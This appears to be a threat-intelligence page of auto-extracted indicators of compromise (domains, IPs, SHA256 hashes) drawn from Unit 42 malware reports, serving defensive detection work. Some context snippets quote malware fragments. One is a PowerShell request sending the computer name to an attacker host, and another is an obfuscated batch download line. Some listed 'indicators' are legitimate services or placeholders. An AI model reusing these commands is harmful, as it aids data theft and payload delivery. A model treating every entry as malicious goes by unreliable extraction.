ZeroHour

Indicators of compromise

4,116 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
domainwindows64x.comer 2019 we observed a host based in Kuwait beaconing to the windows64x[.]com domain using the same DNS tunneling protocol as the CASHYxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainwindows-updates.comHY200 PowerShell scripts that communicated with the domains windows-updates[.]com and firewallsupports[.]com , respectively. We do not havexHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainwinx64-microsoft.comts seen installing CASHY200, which shows another C2 domain, winx64-microsoft[.]com , used by this threat group. Modified time SHA256 FilenamxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
ipv4119.104.111.97C2 server answers these two queries with the IPv4 addresses 119.104.111.97 and 109.105.0.0 , which CASHY200 processes by treating eachxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
ipv41.2.3.4ure 4 shows the DNS server responding to these queries with 1.2.3.4 , which is just a placeholder we included in our C2 serverxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
sha256eccc65711cbd154f680e8c8ef343d53f29e4a6237510abd4ad1eab5742b035b3HY200 DNS Tunneling Protocol We analyzed the file ( SHA256: eccc65711cbd154f680e8c8ef343d53f29e4a6237510abd4ad1eab5742b035b3) in order to understand the capabilities of the payload andxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainclementeolmos.comthis blog. Date Observed C2 Trickbot Payload SHA256 11/7/19 clementeolmos[.]com/supp.php erfd1.exe 24e3fa3fb1df9bd70071e5b957d180cd51bcf1TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainlindaspryinteriordesign.com7a938db9eebe4a0efa573343d89703482cafb2d8 Preview_Report.exe lindaspryinteriordesign[.]com/supp.php nfdusdarm.exe 7d6ff8baebedba414c9f15060f0a847096TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainmaisonmarielouise.orgb093e8da7fb666b2d644197fc3ea22b3931a6150c259479b0c 11/19/19 maisonmarielouise[.]org/supp.php SetupDesktop.exe dc8f259fb55a330d1a8e51d91340465TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainsavute.innloader C2 Trickbot Payload File SHA256 StatementReport.exe savute[.]in/supp.php nfdsus12.exe d1e0902fd1e8b3951e2aec057a938db9eebTrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
sha25624e3fa3fb1df9bd70071e5b957d180cd51bcf10bab690fa7db7425ca6652c47cyload SHA256 11/7/19 clementeolmos[.]com/supp.php erfd1.exe 24e3fa3fb1df9bd70071e5b957d180cd51bcf10bab690fa7db7425ca6652c47c e9fd22631de9c918ac834eb14e01c76aa4d33069c7622daafcd03b4f157TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
sha2567d6ff8baebedba414c9f15060f0a8470965369cbc1088e9f21e2b5289b42a747rt.exe lindaspryinteriordesign[.]com/supp.php nfdusdarm.exe 7d6ff8baebedba414c9f15060f0a8470965369cbc1088e9f21e2b5289b42a747 Table 2. Trickbot Payload Download Locations The two payloaTrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
sha256b3d2e7158620ece90fbc062892db55bf564c6154eb85facab57a459e3bd1156f59fb55a330d1a8e51d913404651b8d785d4ae8c9c655c57b4efbfe71a64 b3d2e7158620ece90fbc062892db55bf564c6154eb85facab57a459e3bd1156f Table 3. Additional Trickbot payloads observed Conclusion BTrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
sha256b8c2329906b4712caa0f8ca7941553b3ed6da1cd1f5cb70f1409df5bc1f0ee4aing Theme File Name SHA256 Annual bonus StatementReport.exe b8c2329906b4712caa0f8ca7941553b3ed6da1cd1f5cb70f1409df5bc1f0ee4a Payroll Preview_Report.exe f8aaf313cc213258c6976cd55c8c0d04TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
sha256d1e0902fd1e8b3951e2aec057a938db9eebe4a0efa573343d89703482cafb2d8HA256 StatementReport.exe savute[.]in/supp.php nfdsus12.exe d1e0902fd1e8b3951e2aec057a938db9eebe4a0efa573343d89703482cafb2d8 Preview_Report.exe lindaspryinteriordesign[.]com/supp.php nTrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
sha256d7687e1d98484b093e8da7fb666b2d644197fc3ea22b3931a6150c259479b0c62631de9c918ac834eb14e01c76aa4d33069c7622daafcd03b4f1574aad0 d7687e1d98484b093e8da7fb666b2d644197fc3ea22b3931a6150c259479b0c6 dc8f259fb55a330d1a8e51d913404651b8d785d4ae8c9c655c57b4efbfeTrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
sha256dc8f259fb55a330d1a8e51d913404651b8d785d4ae8c9c655c57b4efbfe71a6411/19/19 maisonmarielouise[.]org/supp.php SetupDesktop.exe dc8f259fb55a330d1a8e51d913404651b8d785d4ae8c9c655c57b4efbfe71a64 b3d2e7158620ece90fbc062892db55bf564c6154eb85facab57a459e3bdTrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
sha256e9fd22631de9c918ac834eb14e01c76aa4d33069c7622daafcd03b4f1574aad0a3fb1df9bd70071e5b957d180cd51bcf10bab690fa7db7425ca6652c47c e9fd22631de9c918ac834eb14e01c76aa4d33069c7622daafcd03b4f1574aad0 d7687e1d98484b093e8da7fb666b2d644197fc3ea22b3931a6150c25947TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
sha256f8aaf313cc213258c6976cd55c8c0d048f61b0f3b196d768fbf51779786b6ac6ed6da1cd1f5cb70f1409df5bc1f0ee4a Payroll Preview_Report.exe f8aaf313cc213258c6976cd55c8c0d048f61b0f3b196d768fbf51779786b6ac6 Table 1. Trickbot downloader files Both of these downloaderTrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
domain6google.comupdate[.]top) 192.99.138[.]6 4/14/2019 - 5/4/2019 Sakabota (6google[.]com) 104.168.136[.]161 6/24/2019 Newly identified DNS redirecxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainalforatsystem.comactivity 213.202.217[.]0,22 6/1/2018, 12/24/2018 Sakabota (alforatsystem[.]com) 213.202.217[.]4 9/8/2018 Sakabota (firewallsupports[.]coxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainantivirus-update.toped DNS redirect activity 192.99.138[.]4 4/24/2019 Sakabota (antivirus-update[.]top) 192.99.138[.]6 4/14/2019 - 5/4/2019 Sakabota (6google[.]xHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domaincloudipnameserver.comd DNS Hijacking Activity 185.15.247[.]140 1/14/2017 Oilrig (cloudipnameserver[.]com) 185.15.247[.]140 9/9/2018 Sakabota (sakabota[.]com) 185.xHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainffconnectivitycheck.com/2018 DNSpionage Campaign 185.174.101[.]66 8/6/2018 Oilrig (ffconnectivitycheck[.]com) 185.174.101[.]68 2/14/2019 DNSpionage Campaign 199.247.3xHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainfirewallsupports.comta (alforatsystem[.]com) 213.202.217[.]4 9/8/2018 Sakabota (firewallsupports[.]com) 213.202.217[.]9 11/18/2018 - 11/29/2018 Oilrig (googie[.xHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domaingoogie.emailorts[.]com) 213.202.217[.]9 11/18/2018 - 11/29/2018 Oilrig (googie[.]email) 91.132.139[.]200 4/16/2019, 5/12/2019 Newly identified DxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domaingoogle-update.comdate[.]com) 104.168.244[.]213 7/15/2019 - 7/18/2019 Hisoka (google-update[.]com) Additional Resources xHunt Campaign: xHunt Actor’s CheatxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainlearn-service.comeferenced the domain microsofte-update[.]com but changed to learn-service[.]com in December 2019. As of January 2020, this image is no loxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainlowconnectivity.com2018 DNSpionage Campaign 185.161.211[.]86 10/4/2018 Oilrig (lowconnectivity[.]com) 185.161.209[.]147 11/28/2018 Widespread DNS Hijacking AcxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainmicrosofte-update.comure. Beginning in May 2019, the image referenced the domain microsofte-update[.]com but changed to learn-service[.]com in December 2019. As oxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainsakabota.comresolution of interest is with the Sakabota related domain sakabota[.]com . This domain resolved to the IP address 185.15.247[.]140xHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainzombsroyale.ioActivity 199.247.3[.]186 - 198 5/6/2018 - 8/30/2018 Chafer (zombsroyale[.]io) 213.202.217[.]31 7/6/2018 Newly identified DNS redirectxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainafsasdfa33.xyzname " #Start-sleep -s 10 Invoke-WebRequest -Uri " http : //afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername" $ f = get - contentCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
domainexemsi.comD22A040A ) was built using an unregistered version from www.exemsi[.]com with the title of MPZMZQYVXO patch version 5.1 . This verCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
domainnetsupportsoftware.comentationhost.exe ) is started, it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of the host followed by an HTTP PCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
domainprotonmail.comor print industry. All emails were also sent using a random protonmail[.]com email address and contained email subjects related to refCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
domainquickwaysignstx.com> % temp % \ alpaca . bat &EcHo | s ^ et / p = " http^:^/^/^quickwaysignstx[.]com/view.php " > > % temp % \ alpaca . bat &EcHo | s ^ et / pCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
sha25641d27d53c5d41003bc9913476a3afd3961b561b120ee8bfde327a5f0d22a040abe downloaded when using msiexec. The MSI payload (SHA256: 41D27D53C5D41003BC9913476A3AFD3961B561B120EE8BFDE327A5F0D22A040A ) was built using an unregistered version from www.exemsi[.Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
sha25668ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2e macro code below. The hash for this macro code is SHA256: 68ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2 If the user enters an incorrect password, they are presenteCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
sha256e9440a5d2dfe2453ae5b69a9c096f8d4cf9e059d469c5de67380d76e02dd6975able macros. The document used for this analysis is SHA256: E9440A5D2DFE2453AE5B69A9C096F8D4CF9E059D469C5DE67380D76E02DD6975 Figure 4. Delivery document disguised as NortonLifeLock. ToCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
domainapi.ipify.orgitimate domains may be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.Threat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domaincheckip.amazonaws.comy be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazipThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainicanhazip.comazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate domains used by TrThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainip.anysrc.netk: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternaliThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainipecho.netfollowing legitimate domains may be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.Threat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainipinfo.iocheckip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate doThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainmyexternalip.com[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate domains used by Trickbot Anchor_DNS mThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainwtfismyip.comi[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. LThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
sha25669ae50160f22494759f89e2b318fe3f1342a87eeeeb4829fefaeafa4a560d57e0200 Indicators of Compromise Malicious Web Skimmer SHA256: 69ae50160f22494759f89e2b318fe3f1342a87eeeeb4829fefaeafa4a560d57e Acknowledgements We would like to thank Billy Melicher, AleTrends in Web Threats: Attackers Were More Active During Holiday Season
Palo Alto Unit 42
· Aug 17, 2026
domainkomaru.todayiguration decode function. After decoding its C2 server vpn.komaru[.]today from configuration, MooBot will send out a message to infMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
domainwget.shompromised system and renames the binary files to Realtek . wget[.]sh 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07Mirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha25606fc99956bd2afceebbcd157c71908f8ce9ddc81a830cbe86a2a3f4ff79da5f4A226EE541D7A0027C31FF05578E2 MooBot executable file. mipsel 06FC99956BD2AFCEEBBCD157C71908F8CE9DDC81A830CBE86A2A3F4FF79DA5F4 MooBot executable file. sh4 4BFF052C7FBF3F7AD025D7DBAB8BD98Mirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha256188bce5483a9bdc618e0ee9f3c961ff5356009572738ab703057857e8477a36b103F74397C46A21697B7D9C0448BE6 MooBot executable file. i686 188BCE5483A9BDC618E0EE9F3C961FF5356009572738AB703057857E8477A36B MooBot executable file. mips 4567979788B37FBED6EEDA02B3C15FMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha25636dcaf547c212b6228ca5a45a3f3a778271fbaf8e198ede305d801bc98893d5amised system, and renames the binary files to Android . arc 36DCAF547C212B6228CA5A45A3F3A778271FBAF8E198EDE305D801BC98893D5A MooBot executable file. arm 88B858B1411992509B0F2997877402DMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha2563b12aba8c92a15ef2a917f7c03a5216342e7d2626b025523c62308fc799b07373F7AD025D7DBAB8BD985B6CAC79381EB3F8616BEF98FCB01D871 x86_64 3B12ABA8C92A15EF2A917F7C03A5216342E7D2626B025523C62308FC799B0737 Table 4. MooBot samples. Additional Resources New Mirai VarMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha2564567979788b37fbed6eeda02b3c15fafe3e0a226ee541d7a0027c31ff05578e26009572738AB703057857E8477A36B MooBot executable file. mips 4567979788B37FBED6EEDA02B3C15FAFE3E0A226EE541D7A0027C31FF05578E2 MooBot executable file. mipsel 06FC99956BD2AFCEEBBCD157C719Mirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha25646bb6e2f80b6cb96ff7d0f78b3bdbc496b69eb7f22ce15efcaa275f07cfae075system and renames the binary files to Realtek . wget[.]sh 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07CFAE075 The script downloader. It downloads MooBot onto the compromMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha2564bff052c7fbf3f7ad025d7dbab8bd985b6cac79381eb3f8616bef98fcb01d871E9DDC81A830CBE86A2A3F4FF79DA5F4 MooBot executable file. sh4 4BFF052C7FBF3F7AD025D7DBAB8BD985B6CAC79381EB3F8616BEF98FCB01D871 MooBot executable file. x86_64 4BFF052C7FBF3F7AD025D7DBAB8BMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha2567123b2de979d85615c35fca99fa40e0b5fbca25f2c7654b083808653c9e4d61682902E538C2F7146C8666192893258 MooBot executable file. arm7 7123B2DE979D85615C35FCA99FA40E0B5FBCA25F2C7654B083808653C9E4D616 MooBot executable file. i586 CC3E92C52BBCF56CCFFB6F6E2942A6Mirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha25672153e51ea461452263dbb8f658bddc8fb82902e538c2f7146c866619289325849D3014776C1FB527C3B2E3086EBAB MooBot executable file. arm6 72153E51EA461452263DBB8F658BDDC8FB82902E538C2F7146C8666192893258 MooBot executable file. arm7 7123B2DE979D85615C35FCA99FA40EMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha25688b858b1411992509b0f2997877402d8bd9e378e4e21efe024d61e25b29daa0871FBAF8E198EDE305D801BC98893D5A MooBot executable file. arm 88B858B1411992509B0F2997877402D8BD9E378E4E21EFE024D61E25B29DAA08 MooBot executable file. arm5 D7564C7E6F606EC3A04BE3AC63FDEFMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha256b7ee57a42c6a4545ac6d6c29e1075fa1628e1d09b8c1572c848a70112d4c90a1own in the following table: File Name SHA256 Description rt B7EE57A42C6A4545AC6D6C29E1075FA1628E1D09B8C1572C848A70112D4C90A1 A script downloader. It downloads MooBot onto the compromisMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha256cc3e92c52bbcf56ccffb6f6e2942a676b3103f74397c46a21697b7d9c0448be6BCA25F2C7654B083808653C9E4D616 MooBot executable file. i586 CC3E92C52BBCF56CCFFB6F6E2942A676B3103F74397C46A21697B7D9C0448BE6 MooBot executable file. i686 188BCE5483A9BDC618E0EE9F3C961FMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
sha256d7564c7e6f606ec3a04be3ac63fdef2fde49d3014776c1fb527c3b2e3086ebab9E378E4E21EFE024D61E25B29DAA08 MooBot executable file. arm5 D7564C7E6F606EC3A04BE3AC63FDEF2FDE49D3014776C1FB527C3B2E3086EBAB MooBot executable file. arm6 72153E51EA461452263DBB8F658BDDMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
domaincloudfusion.me1, we can extract the collection server of the web skimmer: cloudfusion[.]me . This web skimmer is simple, yet classic. It checks whetTrends in Web Threats: Old Web Skimmer Still Active Today
Palo Alto Unit 42
· Aug 17, 2026
domainmisuperblog.comare traffic based on another similar request to the URL www.misuperblog[.]com/tmz/?sRjPP6ZH=21Ru2Nt5y6IynFa8dNKfckGmLKuTraB2ebSZxsJ3CJwTrends in Web Threats: Old Web Skimmer Still Active Today
Palo Alto Unit 42
· Aug 17, 2026
domainvoques-tfr.xyzfb11f468a1f ). They connect to these IPs through the domain voques-tfr[.]xyz . Although this domain is not resolvable anymore, we analTrends in Web Threats: Old Web Skimmer Still Active Today
Palo Alto Unit 42
· Aug 17, 2026
domainyhys93.siteed JS that triggers several redirects to an adult website ( yhys93[.]site ). Conclusion As we highlighted in this blog, this quarteTrends in Web Threats: Old Web Skimmer Still Active Today
Palo Alto Unit 42
· Aug 17, 2026
sha25679eedf9c1b974992a4beada1bd6343ecadece0b413acccd4deded4a49a4ad2200200 Indicators of Compromise Malicious Web Skimmer SHA256: 79eedf9c1b974992a4beada1bd6343ecadece0b413acccd4deded4a49a4ad220 992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f4Trends in Web Threats: Old Web Skimmer Still Active Today
Palo Alto Unit 42
· Aug 17, 2026
sha256992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f468a1fer malware campaigns, such as the following Trojan (SHA256: 992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f468a1f ). They connect to these IPs through the domain voques-tfr[Trends in Web Threats: Old Web Skimmer Still Active Today
Palo Alto Unit 42
· Aug 17, 2026
domainjs.digestcolect.comlicious domains, including train[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[.]com . Figure 11. DeobfusTrends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
Palo Alto Unit 42
· Aug 17, 2026
domainstat.trackstatisticsss.comrain[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[.]com . Figure 11. Deobfuscated source code of a malicious inTrends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
Palo Alto Unit 42
· Aug 17, 2026
domaintrain.developfirstline.comclicked. We identified several malicious domains, including train[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
Palo Alto Unit 42
· Aug 17, 2026
sha256bb38741575706a94cc1a3ab43d445b641b2c225f408d67a76d3302ca1233e1220200 Indicators of Compromise Malicious Web Skimmer SHA256: bb38741575706a94cc1a3ab43d445b641b2c225f408d67a76d3302ca1233e122 Train[.]developfirstline[.]com Js[.]digestcolect[.]com statTrends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
Palo Alto Unit 42
· Aug 17, 2026
domain8x19.comicators of Compromise Infrastructure Malware C2 comeanalyze.8x19[.]com Malware Host 176.123.9[.]238 198.98.49[.]79 104.244.72[.]Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2560837de91aa6bd52ef79d744daba4238a5a48a79eb91cb1a727da3e97d5b363298.49[.]79 104.244.72[.]64 Artifacts Shell Script Downloader 0837de91aa6bd52ef79d744daba4238a5a48a79eb91cb1a727da3e97d5b36329 c32f8df3cb019e83e0ac49ab0462c59ec70733c3d516ade011727408751Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2561218da43a62da76927484bca73a3eee53425c54625147f8d01149bcef2f09d1e0acc478bf09658a679a4689f34598fe6e92086efe82900242f3cc5b7aec 1218da43a62da76927484bca73a3eee53425c54625147f8d01149bcef2f09d1e 2944db28e4505fc439599dae15b10bf57b7cf6c2597f618f41b99bfc654Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2561cf3879d9e93d1ff30ce5ec0f64ff15b1db7d8237160c83efed688d800e5ef12589A53BDEC49C624F3CB2FC8319218DF721F486E2F15F3C07ABED97AAE6 1cf3879d9e93d1ff30ce5ec0f64ff15b1db7d8237160c83efed688d800e5ef12 c5be50880e2b5a8a8d43a5f1fd6f5d36fc665ab9b4031a9b6a4d5222200Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2561dc4777dac6dc4e8c650241e211311c4a418a35ebded72fcdd6bcb965ccf918b41985c466c131e48b9ba0d1bb80bdb7556c941ee84aa461fe2efbf1e853 1dc4777dac6dc4e8c650241e211311c4a418a35ebded72fcdd6bcb965ccf918b 3e69e8ed741ab39b0914f7e95bf13b2f0ae9f3c1227dcffdea3369e03e8Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha256210f3f1ffd2ec66a5076a7fea5d83caa8bbcdb0f3bc3bd030c77eded6f4b5d9090f6e4d92b511fcde9a712b1a8405c5333e0ad78a4c676a64b22412e149 210f3f1ffd2ec66a5076a7fea5d83caa8bbcdb0f3bc3bd030c77eded6f4b5d90 73cc00acc478bf09658a679a4689f34598fe6e92086efe82900242f3cc5Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2562944db28e4505fc439599dae15b10bf57b7cf6c2597f618f41b99bfc65443c61a43a62da76927484bca73a3eee53425c54625147f8d01149bcef2f09d1e 2944db28e4505fc439599dae15b10bf57b7cf6c2597f618f41b99bfc65443c61 4bffc171c0748cc9e3398b1ce8135b125f54f46752768c981c45d3390e8Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha25631926da5ca004a11c1f46947edb220afe3a53f81cf245b3afae7ea1abaec7c38f1be47233b358889d0594c14409309818d86347d September Campaign 31926da5ca004a11c1f46947edb220afe3a53f81cf245b3afae7ea1abaec7c38 eed4690f6e4d92b511fcde9a712b1a8405c5333e0ad78a4c676a64b2241Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2563e69e8ed741ab39b0914f7e95bf13b2f0ae9f3c1227dcffdea3369e03e8bb79277dac6dc4e8c650241e211311c4a418a35ebded72fcdd6bcb965ccf918b 3e69e8ed741ab39b0914f7e95bf13b2f0ae9f3c1227dcffdea3369e03e8bb792 b2e4ee94783062658ddf2c41e9acafb401d0f93e3848c027383a5ca1928Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2563f3fb70e16d65f5f4b21777b87c9aae6072022c3dfbefd177f37c8aef4a6aeeea88de9b566ce980a8188674319039d2fbe13b049859f8fe4821c92f9200 3f3fb70e16d65f5f4b21777b87c9aae6072022c3dfbefd177f37c8aef4a6aeee 67379740ed15e8da8604cc1f0ea715c8641674de66e553c461b3ae782a5Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2564bffc171c0748cc9e3398b1ce8135b125f54f46752768c981c45d3390e8359a1b28e4505fc439599dae15b10bf57b7cf6c2597f618f41b99bfc65443c61 4bffc171c0748cc9e3398b1ce8135b125f54f46752768c981c45d3390e8359a1 b3a17934f6f72941b9a60097ab09228d873a2f8737ee0ea93b08e5f1cc3Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha2566229041985c466c131e48b9ba0d1bb80bdb7556c941ee84aa461fe2efbf1e8539320f07d7eade9af523297b4bcfd0e0af187272e368e889c988a55ed78e 6229041985c466c131e48b9ba0d1bb80bdb7556c941ee84aa461fe2efbf1e853 1dc4777dac6dc4e8c650241e211311c4a418a35ebded72fcdd6bcb965ccMirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha25663acd589a53bdec49c624f3cb2fc8319218df721f486e2f15f3c07abed97aae6b3b7cb2d57ca1e89999b0b1da80fb9658dff6e44 December Campaign: 63ACD589A53BDEC49C624F3CB2FC8319218DF721F486E2F15F3C07ABED97AAE6 1cf3879d9e93d1ff30ce5ec0f64ff15b1db7d8237160c83efed688d800eMirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha25664545e94daafba191669333e1dd0c6e1190df47e0742bd515911cce0cdbd4fd19a8c4f9bb28582c485549b328d6123e8aea33009ce7657f7fc0ef829e03 64545e94daafba191669333e1dd0c6e1190df47e0742bd515911cce0cdbd4fd1 69bb44736817dabe88e3014c6207ba702f644fb43f6feaec23091af0b52Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha25667379740ed15e8da8604cc1f0ea715c8641674de66e553c461b3ae782a5d0cbe70e16d65f5f4b21777b87c9aae6072022c3dfbefd177f37c8aef4a6aeee 67379740ed15e8da8604cc1f0ea715c8641674de66e553c461b3ae782a5d0cbe ab3d61a76197003822252124e89987d061d6a4a33b9891cea778d3708cdMirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
sha25669bb44736817dabe88e3014c6207ba702f644fb43f6feaec23091af0b5224bc6e94daafba191669333e1dd0c6e1190df47e0742bd515911cce0cdbd4fd1 69bb44736817dabe88e3014c6207ba702f644fb43f6feaec23091af0b5224bc6 eaa387fcc12f2d8a7d42f12d27e7dccb4f3e11492a7d3a3a1ce830a11b5Mirai Variant V3G4 Targets IoT Devices
